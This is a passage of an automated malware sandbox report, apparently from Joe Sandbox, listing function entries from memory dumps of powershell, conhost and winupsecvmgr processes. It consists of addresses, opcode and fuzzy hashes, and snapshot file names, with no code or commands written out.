                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: fprintf
                                                                                                                                                                                                      • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                      • API String ID: 383729395-2713391170
                                                                                                                                                                                                      • Opcode ID: abe0cd034ca6e7e039f3be2709ea70163147327bdca782690fe654ac2d43d253
                                                                                                                                                                                                      • Instruction ID: 26bc4c3e876abf0728d49a33e26cc2ecb9f1c0f4bab92ba495e83e082c923369
                                                                                                                                                                                                      • Opcode Fuzzy Hash: abe0cd034ca6e7e039f3be2709ea70163147327bdca782690fe654ac2d43d253
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47F06223915F4985E2028F28A4001AAB374FF4D799F145325EE8926525DF2AD5428704
                                                                                                                                                                                                      Function 00007FF6E698DE50 Relevance: 5.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavefree
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4020351045-0
                                                                                                                                                                                                      • Opcode ID: 2dfa7707a2d4e303a1a78d16bdb6f7eaf57818cde39d8471c90da31edd0f8fca
                                                                                                                                                                                                      • Instruction ID: ce7e842dbde3024715d2e31a7180bc007bc9ddb8fb8e2d9625c08b8ce73380a6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2dfa7707a2d4e303a1a78d16bdb6f7eaf57818cde39d8471c90da31edd0f8fca
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D110C63F3960386EA548B55E88033962E1AFA4B40B644434C90DC7363DF6FEC45834A

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 00007FFB4AC135FA Relevance: .5, Instructions: 474COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000027.00000002.2536120971.00007FFB4AC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_39_2_7ffb4ac10000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 74e42fb5d1eea2e2b1b35841643a4417f0150638f44f0770c2477f4d143c1f82
                                                                                                                                                                                                      • Instruction ID: c48320cc7844e3c21f6c8365fc533f243afcf4b2fecf539828f4a8528936beb7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74e42fb5d1eea2e2b1b35841643a4417f0150638f44f0770c2477f4d143c1f82
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32F1C4B1A0C94A8FEBD5EF68C845AF97BE5FF54304F2441B9D049D7287DA24A846CBC0
                                                                                                                                                                                                      Function 00007FFB4AC13E80 Relevance: .5, Instructions: 461COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000027.00000002.2536120971.00007FFB4AC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_39_2_7ffb4ac10000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: c31cd0550df5a63bfa75644187fd16efd23a48769d0304e8f5ecefe2bd55681a
                                                                                                                                                                                                      • Instruction ID: 0db8611272a8399ec6cd1a15eeb8df19e9694f65e2b1567e35cf95c77d1be371
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c31cd0550df5a63bfa75644187fd16efd23a48769d0304e8f5ecefe2bd55681a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61E18771A0C94D8FDB95EF6CD845AB97BE1FF58300F2441A9D449D7296CA34E882CBC1
                                                                                                                                                                                                      Function 00007FFB4AC1A3D1 Relevance: .3, Instructions: 311COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000027.00000002.2536120971.00007FFB4AC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_39_2_7ffb4ac10000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: a4935abb8f5eb9a2d4f7b29562cde02c916e7487dd0a98f5dadcddb8a0dffa4d
                                                                                                                                                                                                      • Instruction ID: 376cca452077649c22769980c5de3a0702a82d1a9fbaded5f14e2d95350f4e6b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4935abb8f5eb9a2d4f7b29562cde02c916e7487dd0a98f5dadcddb8a0dffa4d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74410BF2A0E7C54FE796DE7C8D591747FA4FF12240B9841FBD088874D3E91999088B92
                                                                                                                                                                                                      Function 00007FFB4AC1A0E5 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000027.00000002.2536120971.00007FFB4AC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_39_2_7ffb4ac10000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 36ae96f4ae7dbaa6d676d8d15a5c716b3fd75e354eb114dc96e350795e7b4714
                                                                                                                                                                                                      • Instruction ID: ef635c5803498595672b745b933ed5fbe66eba2d387c55d3ac4e4b20c45285b1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36ae96f4ae7dbaa6d676d8d15a5c716b3fd75e354eb114dc96e350795e7b4714
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2731E57191CB488FDB58DF5CDC4A6A97BE0FBA9321F00426FE449C3252DA64A855CBC2
                                                                                                                                                                                                      Function 00007FFB4AAFEAA8 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000027.00000002.2534673592.00007FFB4AAFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AAFD000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_39_2_7ffb4aafd000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 9bd3311f674d50ba45dd7289e61d8523cd5a003d49d47eeab7f81cc93737e336
                                                                                                                                                                                                      • Instruction ID: fae895874cdbc1b1ecd3feb241e346185f50b10dd87261338e08d113e7ff1582
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9bd3311f674d50ba45dd7289e61d8523cd5a003d49d47eeab7f81cc93737e336
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A941047140DBC44FD75A9F39E855A523FF0EF56220B1902DFE088CB1A3D625A84AC7A2
                                                                                                                                                                                                      Function 00007FFB4AC1B1D8 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000027.00000002.2536120971.00007FFB4AC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_39_2_7ffb4ac10000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: b846a643d7b8d1c10741ec0a635ba745c75630c00da5fa444a1227054b172bd5
                                                                                                                                                                                                      • Instruction ID: 10e1bed14dfa23bc44cd53dd850f8e48e86c59d0c5840ee06d6f5c2df0befde7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b846a643d7b8d1c10741ec0a635ba745c75630c00da5fa444a1227054b172bd5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C121047190C64C8FDB59DFACD84A7E97BE0EBA6320F04426BD448C3152D674A41ACB92
                                                                                                                                                                                                      Function 00007FFB4AC14675 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000027.00000002.2536120971.00007FFB4AC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_39_2_7ffb4ac10000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 9917f3665b61f1b4cf24688b0974a73972e94ae79d024ecab79b6f9db2d56c36
                                                                                                                                                                                                      • Instruction ID: 10ad71496306d30d6effb6c6dfbb1f85854cba6e86af952908b308b3a36844dd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9917f3665b61f1b4cf24688b0974a73972e94ae79d024ecab79b6f9db2d56c36
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5201A77010CB0C8FD744EF0CE451AB5B7E0FB99364F10056EE58AC3651D636E892CB41
                                                                                                                                                                                                      Function 00007FFB4ACE4A1D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000027.00000002.2537148990.00007FFB4ACE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACE0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_39_2_7ffb4ace0000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 7570bcb8e1c3648dc0411d61a8a1df4030363c14334e5cb3533bf54dab8b28be
                                                                                                                                                                                                      • Instruction ID: c87de4fa80dfa06f531f30312c968d24899ce4200d9f19f5614c24bd575da93e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7570bcb8e1c3648dc0411d61a8a1df4030363c14334e5cb3533bf54dab8b28be
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15F02E32A0D9048FD798EF6CE8004A833E0EF4532072000FAE05DC7463CA2AECA1CB88
                                                                                                                                                                                                      Function 00007FFB4ACE53E4 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000027.00000002.2537148990.00007FFB4ACE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACE0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_39_2_7ffb4ace0000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: c1ea4887ee526584016a4c0a68f3b03f9884d77d2bd558a7a8d6fb10e85c7d48
                                                                                                                                                                                                      • Instruction ID: 4317a8bbcab3077b64a75b482b31eb2c5e9ed5947f377325ba2fc9302d5fef93
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1ea4887ee526584016a4c0a68f3b03f9884d77d2bd558a7a8d6fb10e85c7d48
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AF0A03131CF044FE748EE2DE44A6A2B3E1FBA8310F10462FE44AC3651DA21E8818782
                                                                                                                                                                                                      Function 00007FFB4ACE4CD0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000027.00000002.2537148990.00007FFB4ACE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACE0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_39_2_7ffb4ace0000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: fb8307187a963c63b7f66e5d19cf6c18ceefa02f3f813d12cc313de3c578b5ed
                                                                                                                                                                                                      • Instruction ID: b6e0b24138c68e9b58278fce267c0b08662e2401102357beb7691fc0e400eaea
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb8307187a963c63b7f66e5d19cf6c18ceefa02f3f813d12cc313de3c578b5ed
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67F0BE72A0D5048FD799EF6CE4414A877E4EF0532071500F6E14ECB463CA26AC54C754
                                                                                                                                                                                                      Function 00007FFB4AC1B038 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000027.00000002.2536120971.00007FFB4AC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_39_2_7ffb4ac10000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 23d1bd657f4038a61952f20d670a112e4816a4e26295f3dc0f2b34b94db3acee
                                                                                                                                                                                                      • Instruction ID: df7bef29c2dc2032138e970fbd347508ef6c9d25818fc8aef3d6718659cba877
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23d1bd657f4038a61952f20d670a112e4816a4e26295f3dc0f2b34b94db3acee
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FE06D75504A4C8FCB44EF18C8595E57BA0FB28300F00419AA55DC7021D72195548FC2

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 00007FFB4AC192FA Relevance: 6.6, Strings: 5, Instructions: 320COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000027.00000002.2536120971.00007FFB4AC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_39_2_7ffb4ac10000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: (CJ$0EJ$HCJ$XDJ$AJ
                                                                                                                                                                                                      • API String ID: 0-3342451538
                                                                                                                                                                                                      • Opcode ID: e17399dcb9c3503bd3a24afd88a287f96dbdb81dd387a6881f54a97c96e40ede
                                                                                                                                                                                                      • Instruction ID: 784752e765e971d4c8247b56b822830bd5ec9aba73d7276cf20fe042016ef8c2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e17399dcb9c3503bd3a24afd88a287f96dbdb81dd387a6881f54a97c96e40ede
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36A109E7B0EAC20FE791DE7C9D990B56F94EF5266875D41F7D0C48A0C7EC0868078691

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 00007FF6687E14B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000002D.00000002.2906742814.00007FF6687E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6687E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 0000002D.00000002.2906657967.00007FF6687E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000002D.00000002.2908437624.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000002D.00000002.2908525082.00007FF6687FC000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000002D.00000002.2912758343.00007FF668D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000002D.00000002.2912822197.00007FF668D69000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000002D.00000002.2912886980.00007FF668D70000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000002D.00000002.2912886980.00007FF668D72000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000002D.00000002.2913314249.00007FF668D75000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000002D.00000002.2914490963.00007FF668D76000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_45_2_7ff6687e0000_winupsecvmgr.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                                                                                                      • Instruction ID: 9aa3de3286ac1145ae7ce0748afe46f02ab00d0d98de37c59cb037bf81a5ee16
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AB0123190A28DD4E7002F32D84229C36306F04741F404030C40C4F352CE7C50804735